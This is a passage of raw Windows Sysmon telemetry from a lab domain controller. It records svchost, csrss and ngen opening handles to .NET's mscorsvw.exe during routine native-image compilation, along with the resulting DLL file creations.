ll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.251{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2A02-00000000A301}4700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.235{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2A02-00000000A301}4700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.235{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2A02-00000000A301}4700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:34.188{59A5CD1D-913A-6005-2902-00000000A301}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12c4-0\PresentationFramework-SystemXml.dll2021-01-18 13:46:34.188 10341000x80000000000000006307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2902-00000000A301}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.126{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2902-00000000A301}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.126{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2902-00000000A301}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2802-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.063{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2802-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.063{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2802-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:34.017{59A5CD1D-9139-6005-2702-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\108c-0\PresentationFramework-SystemDrawing.dll2021-01-18 13:46:34.017 10341000x80000000000000006342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.704{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913B-6005-3302-00000000A301}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.704{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913B-6005-3302-00000000A301}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.704{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913B-6005-3302-00000000A301}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.626{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913B-6005-3202-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.610{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-913B-6005-3202-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.610{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913B-6005-3202-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:35.548{59A5CD1D-913B-6005-3102-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13e0-0\PresentationFramework.Classic.dll2021-01-18 13:46:35.548 10341000x80000000000000006335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.329{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913B-6005-3102-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.329{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913B-6005-3102-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.329{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913B-6005-3102-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913B-6005-3002-00000000A301}2504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.267{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913B-6005-3002-00000000A301}2504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.267{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913B-6005-3002-00000000A301}2504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:35.204{59A5CD1D-913B-6005-2F02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1390-0\PresentationFramework.AeroLite.dll2021-01-18 13:46:35.204 10341000x80000000000000006328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.063{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913B-6005-2F02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.048{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913B-6005-2F02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.048{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913B-6005-2F02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 